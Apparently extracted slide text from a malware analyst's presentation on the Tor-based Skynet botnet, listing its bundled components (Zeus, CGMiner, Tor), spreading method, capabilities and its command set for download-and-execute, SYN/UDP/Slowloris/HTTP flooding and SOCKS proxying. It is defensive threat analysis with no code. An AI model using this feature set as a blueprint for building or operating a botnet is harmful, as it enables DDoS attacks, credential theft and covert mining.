2. The content here I show is only for
education purpose only. I am not responsible for your
actions. The views/ideas/knowledge expressed here
are solely myself and nothing to do with the company
or the organization in which I am currently working.
3. Srinu K
• Working as a malware analyst at Online Guards
• Having 2+ years of experience working with
malware
• Seasoned Penetration tester and Forensic
investigator
• LinkedIn: http://in.linkedin.com/pub/srinu-
neo/39/806/712
4. Size: ~ 15 MB
Skynet is bundled with 4 main components.
1. Tor Client for windows
2. Zeus bot
3. CGMiner
4. Opencl.dll
5. Spreading: via Usenet downloads
Capabilities:
1. Tor Communication
2. Credential grabbing
3. DDOS
4. IRC
5. Bit Coin Mining
12. Feature Commands
Get information on the compromised computer
!info
!version
!hardware
!idle
Download and execute files !download
Download a binary to memory and inject it into other processes !download.mem
Visit a webpage
!visit
!visit.post
SYN and UDP flooding
!syn
!syn.stop
!udp
!udp.stop
Slowloris flooding !slowloris!slowloris.stop
HTTP flooding !http.bwrape!http.bwrape.stop
Open a SOCKS proxy !socks
Retrieve .onion address of the Hidden Service opened on the compromised computer !ip
13.
14. Botnet only mines if the computer is unused for 2 minutes
and if the owner gets back it stops mining immediately.
Skynet installs a WH_MOUSE and a WH_KEYBOARD hook
procedures that monitor the systems for keystrokes or
mouse movements.
15. Another tor based botnet is “Atrax”. In future we are able to see
more botnets adopt tor as a communication channel.